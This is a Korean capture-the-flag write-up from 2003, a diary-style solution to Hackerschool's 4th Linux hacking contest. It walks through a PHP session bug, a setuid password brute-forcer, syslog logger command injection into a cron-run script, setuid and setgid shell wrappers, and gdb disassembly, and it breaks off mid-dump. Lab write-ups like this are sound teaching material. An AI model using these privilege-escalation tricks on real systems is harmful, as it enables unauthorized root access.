::: 다음은 이번 제 4회 Hacking The Linux Contest에서 1위를 차지한 secuboy님의 공격 보고서입니다. :::

#############################################################################

#                                                                           #

#             Hackerschool 제 4회 해킹 대회 문제 풀이                       #

#                                                                           #

#                                       by secuboy(secuboy@hanmail.net)     # 

#                                               2003. 06. 30                #

#############################################################################

 

[2003: 6:28 토요일]

 

오늘은 Mutacker님의 결혼식 날이다. 아침부터 결혼식에 같이 가자고 여기저기서 전화가 빗발 친다.

결혼식이 1시에 일산에서 있으니 식장까지 꼬박 한시간은 걸릴듯하다.

 

12시 정각 퇴근을 위해 부랴부랴 서둘러 정리를 하고 나오는 도중에 붙잡히고 말았다.

중요한 회의가 있으니 개인적인 시간은 포기하란다. 눈물을 머금고 결혼식장 가는 일을 접어야 했다.

 

1시 회의가 끝나고 점심을 먹고 오니 1시40분 포기한 결혼식을 뒤로 한채 해커스쿨 대회의

정황을 보러 살작 둘러보았다.

 

이번에도 웹문제부터 시작을 하는군…”

 

그때 사무실에 newager가 들어왔다. Newager는 미래의 보안업계를 짊어지고 갈  장래가 총망 되는

젊은이이다. 안개속에 쌓여 여지껏 모습을 드러내지 않다가 이제 막 그 모습을 보이고 있는 중이다.

 

Newager에게 문제를 한번 풀어보라고 하고 도서실로 공부하러 갈까 하다가 그만 발목을 잡히고

말았다.

 
━━━━━━━━━━━━━━━━━━
 :: guta – Web Attack ::
━━━━━━━━━━━━━━━━━━

 

http://218.149.4.122/~guta

 

첫 화면에서 보이는 어디어디(?)에서 자주 보아왔던 만화! 워낙 만화를 좋아하다 보니 만화를 보면서

이런 생각 저런 생각들을 해본다.

흠 이런 만화를 대회를 위해서 만들어주다니 정말 정성이 지극하다!!

만화속의 주인공들은 진짜 어떻게 생겼을까나? 등등

 

그러다가 구타가 "형서버 해킹해 버려야지..." 라고 말하고 느낌표를 찍는 부분에 뭔가 있다는 느낌을

막 받고 있는데 옆에서 newager 가 멍멍 페이지가 있다고 한다.

 

http://218.149.4.122/~mungmung

 

이 페이지에 눈에 띄는건 뭐니뭐니해도 회원가입 메뉴

일단 회원가입을 하고 몇번의 시행착오를 거친 뒤

 

http://218.149.4.122/~mung/jsboard/login.php?table=mung 에서 로그인을 한 뒤

 

http://attack.hackerschool.org/~guta/jsboard/login.php?table=secret 에 접속하니

 

아래와 같은 내용의 글을 찾을 수 있었다.

 

----------------------------------------------------

[구타의 글]

여기에다가 잠깐 적어놔야겠다.히히

 

IP : attack.hackerschool.org

ID : guta

PASS : gjqjrwl

----------------------------------------------

 

[root@LABServer newager]# ssh guta@218.149.4.122

guta@218.149.4.122's password:

[guta@localhost guta]$                                                            

 

드디어 로컬 계정에 접속하였다.

벌써 10여명이 로컬 계정에 들어갔다고 한다.

 

일단 등록부터 하고

 

[guta@localhost guta]$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30389

등록 완료되었습니다.

guta 계정의 Password는 gjqjrwl입니다.

건투를 빕니다.!

[guta@localhost guta]$

 

이 문제의 요지는 별도의 두 웹 어플리케이션이 /tmp라는 공통 디렉토리내에서

session을 다루기 때문에 나타난 취약점이다.

즉, mungmung의 로그인에 의해 생긴 /tmp/sess_"cookie값" 파일이

유지된 채로 구타의 홈페이지에 접근하였기 때문에 그 파일에 포함된 변수

값들이 그대로 적용된 것이다.

 

━━━━━━━━━━━━━━━━━━━━━━━━━━
 :: Level1 – Local attack & debugging ::
━━━━━━━━━━━━━━━━━━━━━━━━━━

 

[guta@attack QUESTION]$ ls -al

합계 32

drwxr-x---    2 root     guta         4096  6 28 15:10 .

drwxr-x--x    4 root     guta         4096  6 28 09:08 ..

-r--r-----    1 level1   level1         38  6 28 02:54 Password.txt

-rwsr-x---    1 level1   guta        12802  6 28 03:07 auth

-rw-r-----    1 root     root          794  6 28 03:07 auth.c

-rw-r--r--    1 root     root            0  6 28 15:10 level1

 

setuid 걸린 auth파일이 있다.

당시엔 소스를 볼수 없던 관계로 (대회 후반은 소스 공개)

일단 gdb로 열어보았다.

 

[guta@attack my]$ cp /home/guta/QUESTION/auth .

 

원본은 setuid가 걸려있어  ptrace 버그가 한바탕 난리를 치고 간 후부터

패치되어 있는 섭에서는 gdb로 디버깅이 안된다.

 

하지만 읽기 권한이 있는 넘들은 저렇게 복사를 해서 setuid 비트가 없는

상태에서 작업이 가능하다.

 

소스를 분석해 본 결과는 아래와 같다.

 

[guta@attack my]$ gdb -q auth

(gdb) disas main

Dump of assembler code for function main:

0x08048531 <main+0>:    push   %ebp

0x08048532 <main+1>:    mov    %esp,%ebp

0x08048534 <main+3>:    sub    $0x58,%esp

 

           FILE fff4;

           char ffb8[40]; // f4 - b8 메모리공간

           char *ffb4;

           char *ffb0;

 

0x08048537 <main+6>:    and    $0xfffffff0,%esp

0x0804853a <main+9>:    mov    $0x0,%eax

0x0804853f <main+14>:   sub    %eax,%esp

0x08048541 <main+16>:   cmpl   $0x2,0x8(%ebp)

0x08048545 <main+20>:   je     0x8048557 <main+38>

 

           if (argc != 2) {

 

0x08048547 <main+22>:   sub    $0xc,%esp

0x0804854a <main+25>:   mov    0xc(%ebp),%eax

0x0804854d <main+28>:   pushl  (%eax)

0x0804854f <main+30>:   call   0x8048508 <print_error>

0x08048554 <main+35>:   add    $0x10,%esp

 

        print_error(argv[0]);

 

0x08048557 <main+38>:   sub    $0x8,%esp

0x0804855a <main+41>:   push   $0x8048715         <------- "r"

0x0804855f <main+46>:   push   $0x8048720          <------- "/home/guta/QUESTION/Password.txt"

0x08048564 <main+51>:   call   0x8048448 <fopen>

0x08048569 <main+56>:   add    $0x10,%esp

0x0804856c <main+59>:   mov    %eax,0xfffffff4(%ebp)

 

        fff4 = fopen("/home/guta/QUESTION/Password.txt", "r");

 

0x0804856f <main+62>:   sub    $0x4,%esp

0x08048572 <main+65>:   pushl  0xfffffff4(%ebp)

0x08048575 <main+68>:   push   $0x28

0x08048577 <main+70>:   lea    0xffffffb8(%ebp),%eax

0x0804857a <main+73>:   push   %eax

0x0804857b <main+74>:   call   0x80483d8 <fgets>

0x08048580 <main+79>:   add    $0x10,%esp

 

        fgets(ffb8, 0x28, fff4);

 

0x08048583 <main+82>:   sub    $0xc,%esp

0x08048586 <main+85>:   lea    0xffffffb8(%ebp),%eax

0x08048589 <main+88>:   push   %eax

0x0804858a <main+89>:   call   0x80483e8 <strlen>

0x0804858f <main+94>:   add    $0x10,%esp

 

           strlen[ffb8]

 

0x08048592 <main+97>:   dec    %eax

0x08048593 <main+98>:   movb   $0x0,0xffffffb8(%eax,%ebp,1)

 

           ffb8[strlen(ffb8)-1] = '\0';

 

0x08048598 <main+103>:  sub    $0xc,%esp

0x0804859b <main+106>:  pushl  0xfffffff4(%ebp)

0x0804859e <main+109>:  call   0x8048418 <fclose>

0x080485a3 <main+114>:  add    $0x10,%esp

 

           fclose(fff4);

 

0x080485a6 <main+117>:  lea    0xffffffb8(%ebp),%eax

0x080485a9 <main+120>:  mov    %eax,0xffffffb4(%ebp)

 

           ffb8 = ffb4;

 

0x080485ac <main+123>:  mov    0xc(%ebp),%eax  <-----argv[0]위치

0x080485af <main+126>:  add    $0x4,%eax            <---- argv[1]위치로

0x080485b2 <main+129>:  mov    (%eax),%eax

0x080485b4 <main+131>:  mov    %eax,0xffffffb0(%ebp)

 

           ffb0 = argv[1];

 

0x080485b7 <main+134>:  mov    0xffffffb0(%ebp),%eax

0x080485ba <main+137>:  cmpb   $0x0,(%eax)      <----ffb0 0이면

 

           while(*ffb0) {

 

0x080485bd <main+140>:  jne    0x80485c1 <main+144>

0x080485bf <main+142>:  jmp    0x80485fa <main+201>        <----ffb0 0되면 main+201

0x080485c1 <main+144>:  mov    0xffffffb0(%ebp),%eax

0x080485c4 <main+147>:  mov    %eax,%ecx

0x080485c6 <main+149>:  mov    0xffffffb4(%ebp),%eax

0x080485c9 <main+152>:  mov    %eax,%edx

0x080485cb <main+154>:  lea    0xffffffb4(%ebp),%eax                     

0x080485ce <main+157>:  incl   (%eax)                               <---- ffb4++

0x080485d0 <main+159>:  lea    0xffffffb0(%ebp),%eax

0x080485d3 <main+162>:  incl   (%eax)                               <---- ffb0++

0x080485d5 <main+164>:  mov    (%ecx),%al

0x080485d7 <main+166>:  cmp    (%edx),%al

0x080485d9 <main+168>:  je     0x80485b7 <main+134>       <----ffb0 ffb4같을경우 반복 비교

 

           if (ffb0 != ffb4) {

 

0x080485db <main+170>:  sub    $0x8,%esp

0x080485de <main+173>:  push   $0x8048741                     <-------"Password is not correct!\n");

0x080485e3 <main+178>:  pushl  0x80498a8

0x080485e9 <main+184>:  call   0x80483b8 <fprintf>

0x080485ee <main+189>:  add    $0x10,%esp

 

           fprintf(stdout, "Password is not correct!\n");

  

0x080485f1 <main+192>:  movl   $0xffffffff,0xffffffac(%ebp)      <----- return -1;

0x080485f8 <main+199>:  jmp    0x804862f <main+254>        <----- while }

 

           return -1;

 

             위의 코드들을 조합하면 아래와 같은 while문이 형성된다.

             keypoint이다. 결국 *ffb0 길이 만큼만 비교를 해주고 있다.

             한글자를 넣으면 한글자만 비교한다는 이야기!!!

 

      while(*ffb0){

           if(*ffb0 != *ffb4){

                        fprintf(stdout, "Password is not correct!\n");

                        return -1;

           }

           ffb0++;

           ffb4++;

      }

 

0x080485fa <main+201>:  sub    $0xc,%esp

0x080485fd <main+204>:  push   $0x804875b                       <---- "Wow! You got the new shell\n"

0x08048602 <main+209>:  call   0x8048408 <printf>

0x08048607 <main+214>:  add    $0x10,%esp

 

        printf("Wow! You got the new shell\n");

 

0x0804860a <main+217>:  sub    $0x8,%esp

0x0804860d <main+220>:  push   $0x1f9

0x08048612 <main+225>:  push   $0x1f9

0x08048617 <main+230>:  call   0x8048428 <setreuid>

0x0804861c <main+235>:  add    $0x10,%esp

 

        setreuid(505, 505);                                            <---- level1 uid

 

0x0804861f <main+238>:  sub    $0xc,%esp

0x08048622 <main+241>:  push   $0x8048777

0x08048627 <main+246>:  call   0x80483c8 <system>

0x0804862c <main+251>:  add    $0x10,%esp

 

        system("/bin/bash -p");

 

0x0804862f <main+254>:  mov    0xffffffac(%ebp),%eax

0x08048632 <main+257>:  leave 

0x08048633 <main+258>:  ret   

End of assembler dump.

(gdb)

 

 

한글자를 넣으면 한글자만 비교 한다는 점에 착안 아래와 같은 간단한 프로그램을

만들어서 쉽게 level1의 쉘을 따낼 수 있었다.

 

-------------------level1ex.c---------------------

#include <stdio.h>

#include <stdlib.h>

 

#define TARGET "/home/guta/QUESTION/auth"

 

main()

{

        int num=0;

        char cmd[1024];

        for(num=0; num<=0xff; num++) {

                     sprintf(cmd, "%s `perl -e 'print \"\\x%02x\"'`", TARGET, num);

                     fprintf(stderr, "%s\n", cmd);

                     system(cmd);

        }

}

 

[guta@attack my]$ ./level1ex

/home/guta/QUESTION/auth `perl -e 'print "\x00"'`

Usage : /home/guta/QUESTION/auth password

/home/guta/QUESTION/auth `perl -e 'print "\x01"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x02"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x03"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x04"'`

Password is not correct!

 

....중략 ....

 

/home/guta/QUESTION/auth `perl -e 'print "\x57"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x58"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x59"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x5a"'`

Password is not correct!

/home/guta/QUESTION/auth `perl -e 'print "\x5b"'`

Wow! You got the new shell

[level1@attack my]$                                   <---------\x5b에서 level1의 쉘이 떨어졌다.

 

[level1@attack my]$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30389

등록 완료되었습니다.

level1 계정의 Password는 aksgdlwhffu입니다.

건투를 빕니다.!

[level1@attack my]$

 

..순조롭게 잘 진행되고 있다.

이제 레벨1까지 푼 사람들이 5명 정도 보인다.

 

 

━━━━━━━━━━━━━━━━━━━
 :: Level2 – syslogd ::

━━━━━━━━━━━━━━━━━━━

 

[root@LABServer newager]$ ssh level1@attack.hackerschool.org                 //level1접속

level1@attack.hackerschool.org's password:

2차 암호를 입력하시오. :

[level1@attack level1]$

 

갑자기 나타난 2차암호에 당황 하였으나 ... ctrl+c(SIGINT)로 빠져나올 수 있었다.

 

[level1@attack level1]$ id

uid=505(level1) gid=505(level1) groups=505(level1)

[level1@attack level1]$ ls

QUESTION  reconfirm

[level1@attack level1]$ cd QUESTION/

[level1@attack QUESTION]$ ls

hint.txt

[level1@attack QUESTION]$ cat hint.txt

SYSLOGD

[level1@attack QUESTION]$

 

syslogd가 힌트란 말이 나를 참으로 당황스럽게 하였다.

전혀 방향을 잡지 못하다가 우리의 영원한 해결사 구글이(Google)를 불렀다.

하여 어찌어찌 공격을 해야하는지 어떤 유형의 문제가 나오는지 대략감을 잡고

syslogd와 관련된 자료들을 수집하였다.

 

/etc/syslog.conf에 들어있는 내용

===============================================================

 

[level1@attack QUESTION]$ cat /etc/syslog.conf

# Log all kernel messages to the console.

# Logging much else clutters up the screen.

#kern.*                                                 /dev/console

 

....중략....

 

# Save boot messages also to boot.log

local7.*                                                /var/log/boot.log

 

# for hacking contest

# this script excutes by crond every minute

local5.warning  /home/level2/QUESTION/backdoor.sh                     <------here!!

[level1@attack QUESTION]$

 

 

cron 에 들어있는 내용(요건 문제 다 풀고 난 후 한참있다 보여준 내용임)

================================================================

# DO NOT EDIT THIS FILE - edit the master and reinstall.

# (/tmp/crontab.11498 installed on Sat Jun 28 09:05:55 2003)

# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

*/1 * * * * /bin/sh /home/level2/QUESTION/backdoor.sh

*/5 * * * * perl -e 'print "#!/bin/bash\n"' > /home/level2/QUESTION/backdoor.sh

 

5분마다 해당 backdoor를 실행시키는 cron 이다.

 

위와 같은 정보와 그리고 logger라는 명령어로 무언가 작업을 할 수 있다는 정보들을

입수했다.

 

난 서버 관리쪽은 잘 모른다. 그래서 서버관리와 관련된 취약점을 이용한 문제만

나오면 정말 어찌할 바를 모르겠다.

하지만 이런 유의 문제는 또 조금만 공부하면 쉽게 풀리는 단점이 있다.

 

내가 해커스쿨 문제를 좋아하는 이유중에 하나는 꼭 이런류의 문제들이 한 두개 출제가

된다는 것이다 그것은 나에게 늘 새로운 즐거움이다.

 

Newager 군과 여러가지 삽질을 통해 정확한 공격 방법을 알게 되었다.

 

공격 :

----------------------go.c----------------------------

#include <syslog.h>

#include <stdio.h>

#include <unistd.h>

#include <sys/types.h>

 

int main(int argc, char **argv)

{

        system("cp /bin/ash /var/tmp/my/ash");

        system("chmod 6777 /var/tmp/my/ash");

 

}

 

[level1@attack my]$ gcc -o go go.c

 

[level1@attack my]$ logger -p local5.warning

;/tmp/my/go; 

[level1@attack my]$

 

이렇게 해놓고 기다리니 /tmp/my에 setuid가 걸린 ash쉘이 카피 되었다.

 

[level1@attack my]$ ./ash

$ id

uid=505(level1) gid=505(level1) euid=506(level2) egid=506(level2) groups=505(level1)

 

인증을 위해 (인증시 euid가 아닌 uid를 확인) 아래의 프로그램으로 level2의 uid를 얻었다.

 

------------setuid.c-------------

main()

{

        setreuid(506, 506);

        setregid(506, 506);

        system("/bin/sh");

}

 

$ gcc -o setuid setuid.c

$ chmod 6777 setuid setuid

$ ./setuid

sh-2.05b$ id

uid=506(level2) gid=506(level2) groups=505(level1)

sh-2.05b$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30389

등록 완료되었습니다.

level2 계정의 Password는 aoxmflrtm입니다.

level3 계정의 Password는 tpqktmcks입니다.

건투를 빕니다.!

sh-2.05b$

 

레벨 3의 패스워드까지 같이 나왔다.

 

 

━━━━━━━━━━━━━━
 :: Level3 – setgid ::

━━━━━━━━━━━━━━

 

[root@LABServer newager]$ ssh level3@attack.hackerschool.org

level3@attack.hackerschool.org's password:

Sorry, I stole your GID authority.

uid=507(level3) gid=506(level2) groups=507(level3)

 

접속하자 마자 level3의 gid가 level2가 되었다.

 

나는 gid에 한이 있는 사람이다.

올해 초 모 해킹대회에서 gid를 가지고 하루종일 씨름을 한 적이 있었다.

이번 경우는 아주 쉽게 gid를 얻을 수 있는 경우이다.

 

Newgrp ,  chgrp ,  sendmail 이용, cron 이용 등등 여러가지 방법중

가장 손쉬운 방법으로 gid 쉘을 얻을 수 있었다.

 

즉, 그룹 권한을 다시 level3으로 만드는 프로그램을 작성하면 해결할 수 있다.

bash-2.05b$ cd /tmp/mydir

bash-2.05b$ vi setgid.c

 

main()

{

        setregid(507, 507);

        system("/bin/sh");

}

 

 

bash-2.05b$ gcc -o setgid setgid.c

bash-2.05b$ chgrp level3 setgid                //프로그램의 group level3으로 바꿔주고

bash-2.05b$ chmod 2777 setgid                //setgid비트를 설정한다.

bash-2.05b$ ./setgid

sh-2.05b$ id

uid=507(level3) gid=507(level3) groups=507(level3)  // level3권한이다.

sh-2.05b$

 

sh-2.05b$ /bin/register

건투를 빕니다.

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30389

등록 완료되었습니다.

제 2 서버 : guru.hackerschool.org

ID : guru1

PASSWD : cnrgkgkqslek(축하합니다)

sh-2.05b$

 

 

━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 :: Guru1 – 실행화일 Debugging ::

━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 

[root@LABServer newager]$ ssh guru1@guru.hackerschool.org

guru1@guru.hackerschool.org's password:

* 돌아온 2차 암호맨 *

2차 암호를 입력하세요. : Ctrl+C 키를 사용하실 수 없습니다.

종료 시그널을 보내셨습니다.

 

[guru1@guru guru1]$

 

예전과 같이 ctrl+c를 해봤으나 막혀있었다 ctrl+\ 로 통과된다.

ctlr+\는 SIGQUIT 코어/종료시그널이다.

 

우리의 공격목표는 /home/guru1/QUESTION/vuln 이라는 파일이다.

 

이넘은 guru1에 read 권한이 없었다.

이쯤하면 bof 문제가 한문제정도 나오겠거니 싶어 바로 공격에 들어갔다.

 

[guru1@guru QUESTION]$ ./vuln `perl -e 'print "A"x500'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAASegmentation fault

[guru1@guru QUESTION]$

 

매개변수를 500개정도 채워 넣자 "Segmentation fault" 메시지가 나왔다.

 

이거 쉽겠구만..!!!

 

egg쉘을 하나 가져와서 얼릉 띄어놓고 가볍게 공격을 했다.

 

./vuln `perl e print \x88\xf9\xff\튤x200`

 

그런데 쉘은 안떨어지고 Seg fault만 또 나온다.

 

문제가 쉽지는 않으리라 생각하고 별의 별 삽질을 다 해본다.

혹시나 카나리 0x1234567 이 있지나 않을까 싶어 카나리로 전부 덮어도 보고

omega는 될까 싶어 오메가도 해보고

 

등등 여러 삽질을 하다가.

 

[guru1@guru my]$ vi test.c

 

main(int argc, char **argv)

{

        char buf[20];

        strcpy(buf, argv[1]);

}

"test.c" [새로운] 5L, 70C 저장 했습니다                        

[guru1@guru my]$ gcc -o test test.c

[guru1@guru my]$ ./test `perl -e 'print "A"x100'`

세그멘테이션 오류

[guru1@guru my]$

 

위와 같이 임의의 소스를 하나 컴파일해서 테스트를 해보니

segmentation fault가 한글로 나오는 것이었다!

 

아 이런 fake군!!!

디버깅을 하지 않고는 답을 구할 수 없을 듯 싶었다.

 

혹시나 해서 trace 를 해 보았으나.. 그것도 전혀 안된다.

 

정말 막막해지고 있었다.

 

그러다가 대회는 문제를 위해 존재한다는 생각에 어딘가에 이 문제를 해결할 열쇠가

있을 것이란 추측을 하고 섭을 뒤지기 시작했다.

 

그렇게 해서 발견한 그곳에서 guru2와 guru3의 비밀번호를 보고 말았다.

 

심봤다!!!!!!!!!!!!!!!!!!

 

Guru2로 접속을 한 후에 guru2권한으로 vuln 프로그램을 나의 디렉토리로 옴겨와서

Guru1에서 다시 gdb로 열어보았다.

 

아래와 같은 소스를 유추할 수 있었다.

 

(gdb) disas main

Dump of assembler code for function main:

0x080483fc <main+0>:    push   %ebp

0x080483fd <main+1>:    mov    %esp,%ebp

0x080483ff <main+3>:    sub    $0x78,%esp

 

0x08048402 <main+6>:    and    $0xfffffff0,%esp

0x08048405 <main+9>:    mov    $0x0,%eax

0x0804840a <main+14>:   sub    %eax,%esp

0x0804840c <main+16>:   mov    0xc(%ebp),%eax

0x0804840f <main+19>:   add    $0x4,%eax

0x08048412 <main+22>:   cmpl   $0x0,(%eax)

0x08048415 <main+25>:   je     0x804846b <main+111>

 

0x08048417 <main+27>:   sub    $0x8,%esp

0x0804841a <main+30>:   mov    0xc(%ebp),%eax

0x0804841d <main+33>:   add    $0x4,%eax

0x08048420 <main+36>:   pushl  (%eax)

0x08048422 <main+38>:   push   $0x8048578                       <--- "%s"

0x08048427 <main+43>:   call   0x804832c <printf>   

0x0804842c <main+48>:   add    $0x10,%esp

 

           printf("%s", argv[1]);

 

0x0804842f <main+51>:   sub    $0xc,%esp

0x08048432 <main+54>:   mov    0xc(%ebp),%eax

0x08048435 <main+57>:   add    $0x4,%eax

0x08048438 <main+60>:   pushl  (%eax)

0x0804843a <main+62>:   call   0x804830c <strlen>

0x0804843f <main+67>:   add    $0x10,%esp

 

           if(strlen(argv[1]) > 0x64) {

 

0x08048442 <main+70>:   cmp    $0x64,%eax

0x08048445 <main+73>:   jbe    0x8048459 <main+93>

 

 

0x08048447 <main+75>:   sub    $0xc,%esp

0x0804844a <main+78>:   push   $0x804857b

0x0804844f <main+83>:   call   0x804832c <printf>

0x08048454 <main+88>:   add    $0x10,%esp

 

           printf( "Segmentation fault\n");

 

 

0x08048457 <main+91>:   jmp    0x804847b <main+127>

 

0x08048459 <main+93>:   sub    $0xc,%esp

0x0804845c <main+96>:   push   $0x804858f

0x08048461 <main+101>:  call   0x804832c <printf>

0x08048466 <main+106>:  add    $0x10,%esp

 

           printf("Using argv[1]\n");

 

 

0x08048469 <main+109>:  jmp    0x804847b <main+127>

 

0x0804846b <main+111>:  sub    $0xc,%esp

0x0804846e <main+114>:  push   $0x8048591

0x08048473 <main+119>:  call   0x804832c <printf>

0x08048478 <main+124>:  add    $0x10,%esp

 

           printf("\n");

 

0x0804847b <main+127>:  mov    0xc(%ebp),%eax

0x0804847e <main+130>:  add    $0x8,%eax

0x08048481 <main+133>:  cmpl   $0x0,(%eax)

0x08048484 <main+136>:  je     0x80484c7 <main+203>

 

           return 0;

 

0x08048486 <main+138>:  sub    $0x8,%esp

0x08048489 <main+141>:  mov    0xc(%ebp),%eax

0x0804848c <main+144>:  add    $0x8,%eax

 

 

0x0804848f <main+147>:  pushl  (%eax)

0x08048491 <main+149>:  push   $0x80485a0

0x08048496 <main+154>:  call   0x80482ec <strcmp>

0x0804849b <main+159>:  add    $0x10,%esp

 

           strcmp("eyes", argv[2])

 

0x0804849e <main+162>:  test   %eax,%eax

0x080484a0 <main+164>:  jne    0x80484c7 <main+203>

0x080484a2 <main+166>:  sub    $0x8,%esp

0x080484a5 <main+169>:  push   $0x1f6

0x080484aa <main+174>:  push   $0x1f6

0x080484af <main+179>:  call   0x804833c <setreuid>

0x080484b4 <main+184>:  add    $0x10,%esp

 

           setreuid(0x1f6, 0x1f6);

 

0x080484b7 <main+187>:  sub    $0xc,%esp

0x080484ba <main+190>:  push   $0x80485a5

0x080484bf <main+195>:  call   0x80482fc <system>

0x080484c4 <main+200>:  add    $0x10,%esp

 

           system("/bin/sh");

 

0x080484c7 <main+203>:  leave 

0x080484c8 <main+204>:  ret   

0x080484c9 <main+205>:  nop   

0x080484ca <main+206>:  nop   

0x080484cb <main+207>:  nop   

End of assembler dump.

(gdb)

 

 

소스를 분석 해보면 두개의 아규먼트를 받는데 그중 두번째 아규먼트(argv[2]) 값이

eyes 면 guru2 쉘을 실행시켜준다.

 

그렇게 쉘을 획득하여 등록을 하였다.

 

sh-2.05b$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30389

등록 완료되었습니다.

guru2의 패스워드는 woaldlTek입니다.

sh-2.05b$

 

이때가 저녁 8시쯤 되었을 것이다.

와이프한테 전화가 걸려온다. 친구 집들이에 가야하는데 안오냐구 난리다.

Newager 군 역시 저녁 8시가 넘으면 컴퓨터를 할 수 없다.

 

이쯤에서 오늘은 접어야 할 듯하다.

 

혹시나 몰라 guru3 등록을 먼저 해버렸다.

 

sh-2.05b$ /bin/register

축하합니다.!

고유번호를 입력해 주십시오 : #H4SC30389

등록 완료되었습니다.

guru3의 패스워드는 whrmaaksej입니다.

sh-2.05b$

 

 

[2003: 6:29 일요일]

 

밤새도록 친구들과 놀다가 새벽녘에 잠이 들었다.

아침 9시쯤 눈을 뜨고 밥을 먹고 있는데 전화가 왔다.

마지막 문제가 root 획득하는 문제인데 Newager 군이 혼자 먼저 해 보겠다고 한다.

 

10시 30에 출발하여 전철을 타고 오는 중 할머니가 무거운 옥수수를 잔뜩 들고와서

파시는게 너무 안되보여 3000원어치 사들고 사무실로 도착한 시간이 12시 20분이다.

 

Root 문제는 raw socket 문제였다.

Newager 군이 대충 소스를 분석하여 raw socket 플로그램을 얼추 다 만들어 놓고 있었다.

뒤에 다시 설명을 하겠지만 100바이트에 바인드 쉘을 어떻게 넣느냐를 가지고 고민을 하고 있는 중이었다.

 

그러던 중에 guru1 문제에 오류가 있어서 문제가 바뀌었다는 이야기와

guru2 문제 소스를 공개했다는 소리를 듣고 해당 문제들을 다시 풀어보기로 했다.

 

먼저 guru1을 다시 풀어보기로 했다.

 

Read 권한이 있으므로 ltrace로 실행 상태를 대충 살펴 보았다.

 

[guru1@guru my]$ ltrace ./vuln aaaa                                                 

//인자를 1개 넣었을 경우

 

__libc_start_main(0x0804841c, 2, 0xbfffde04, 0x08048538, 0x08048568 <unfinished ...>

printf("%s", "aaaa")                                                         = 4

strlen("aaaa")                                                               = 4

printf("\n"aaaa

)                                                                 = 1

+++ exited (status 20) +++

[guru1@guru my]$

[guru1@guru my]$ ltrace ./vuln aaaa bbbb                             //인자를 2넣었을 경우

 

__libc_start_main(0x0804841c, 3, 0xbffff374, 0x08048538, 0x08048568 <unfinished ...>

printf("%s", "aaaa")                                                         = 4

strlen("aaaa")                                                               = 4

printf("\n"aaaa

)                                                                 = 1

crypt("aaaa", "sa")                                                          = "sa1a7AwhYV8SQ"

strcmp("sa1a7AwhYV8SQ", "bbbb")                                              = 1

+++ exited (status 20) +++

[guru1@guru my]$

 

 

sa를 salt로 한 argv[1]의 crypt값과 argv[2]의 값을 비교를 한다는 것을 알 수 있다.

 

[guru1@guru my]$ ./guru1 aaaa sa1a7AwhYV8SQ

 

의외로 아무 반응이 없다.

 

Gdb로 다시 자세히 들여다 봐야겠다.

 

그런데 많은 이들이 gdb로 소스 분석을 제대로 못하고 있었다.

그 이유는 gdb로 break를 걸 수가 없어 프로그램을 단계적으로 실행을 못하기 때문이었던 것 같다.

 

접속방식이 ssh  이기에 sftp로 프로그램 파일을 내 테스트 서버로 옮겨 울 수가 있었던 것을

 

어쨋거나 역어셈블을 또 해 보았다.

 

(gdb) disas main

Dump of assembler code for function main:

0x0804841c <main+0>:    push   %ebp

0x0804841d <main+1>:    mov    %esp,%ebp

0x0804841f <main+3>:    sub    $0x8,%esp

 

0x08048422 <main+6>:    and    $0xfffffff0,%esp

0x08048425 <main+9>:    mov    $0x0,%eax

 

0x0804842a <main+14>:   sub    %eax,%esp

0x0804842c <main+16>:   mov    0xc(%ebp),%eax

0x0804842f <main+19>:   add    $0x4,%eax

0x08048432 <main+22>:   cmpl   $0x0,(%eax)

0x08048435 <main+25>:   je     0x8048495 <main+121>

 

           if (argv[1] != 0) {

 

0x08048437 <main+27>:   sub    $0x8,%esp

0x0804843a <main+30>:   mov    0xc(%ebp),%eax

0x0804843d <main+33>:   add    $0x4,%eax

0x08048440 <main+36>:   pushl  (%eax)

0x08048442 <main+38>:   push   $0x80485e4                      <--- "%s"

0x08048447 <main+43>:   call   0x804834c <printf>

0x0804844c <main+48>:   add    $0x10,%esp

 

          printf("%s", argv[1]);

 

0x0804844f <main+51>:   sub    $0xc,%esp

0x08048452 <main+54>:   mov    0xc(%ebp),%eax

0x08048455 <main+57>:   add    $0x4,%eax

0x08048458 <main+60>:   pushl  (%eax)

0x0804845a <main+62>:   call   0x804832c <strlen>

0x0804845f <main+67>:   add    $0x10,%esp

 

           strlen(argv[1])

 

0x08048462 <main+70>:   cmp    $0x64,%eax

0x08048465 <main+73>:   jbe    0x8048483 <main+103>

0x08048467 <main+75>:   sub    $0xc,%esp

0x0804846a <main+78>:   push   $0x80485e7                      <---  "Segmentation fault\n"

0x0804846f <main+83>:   call   0x804834c <printf>

0x08048474 <main+88>:   add    $0x10,%esp

 

           if (strlen(argv[1]) > 0x64 ) {

              printf("Segmentation fault\n");

 

0x08048477 <main+91>:   movl   $0x0,0xfffffff8(%ebp)

